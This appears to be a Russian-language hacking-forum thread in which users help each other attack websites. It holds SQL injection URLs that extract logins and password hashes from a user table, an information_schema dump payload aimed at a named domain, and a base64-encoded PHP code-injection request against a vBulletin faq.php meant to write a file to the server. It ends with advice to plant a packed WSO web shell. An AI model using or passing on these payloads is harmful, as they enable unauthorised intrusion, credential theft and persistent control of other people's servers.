ANTICHAT — форум по информационной безопасности, OSINT и технологиям

пробуй UNION ALL SELECT 1,2

результат тоже

c error based буду разбираться ибо новичок в sql пока

Такой вопрос

index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*

Таким запросом я могу просматривать хэши, меняя только значения limit,

а каким запросом можно перемаслать Юзверей?

Ты имеешь ввиду логины ?

ну например так

index.php?kat=2&kp=-39+union+select+concat_ws(0x2F,login,pass)+from+user+limit+0,1/*

вывод будет логин/хеш

или так

index.php?kat=2&kp=-39+union+select+concat(login,0x2F,pass)+from+user+limit+0,1/*

вывод будет такой же

В других параметрах

_http://mastiff-dog.com/index.php?PageT=ForSale&act=&CatID=-1+union+select+1,2,3,(select(@x)from(select(@x:=0x 00),(select(null)from(information_schema.columns)w here(table_schema!=0x696e666f726d6174696f6e5f73636 8656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table _schema,0x2e,table_name,0x3a,column_name))))x),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4+--+

пытаюсь создать файл

Powered by vBulletin® Version 3.8.5

file_put_contents('lala.php', '');

allow_url_include=Off

disable_functions=no value

magic_quotes_gpc=On

http://www.site.com/forum/faq.php?cmd=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=

выводит

Fatal error: Call to undefined function bas64_decode() in /var/www/site.com/forum/faq.php(329) : eval()'d code(1) : eval()'d code on line 1

что можно еще сделать?

er9j6@

base64_decode

http://www.site.com/forum/faq.php?cmd=base64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTsNCg==

все равно выводит

404 - Компонент не найден!

2er9j6@,

vbulletin? Тогда смело ставь код пакованного WSO ~25kb. Потом лей как хочешь =)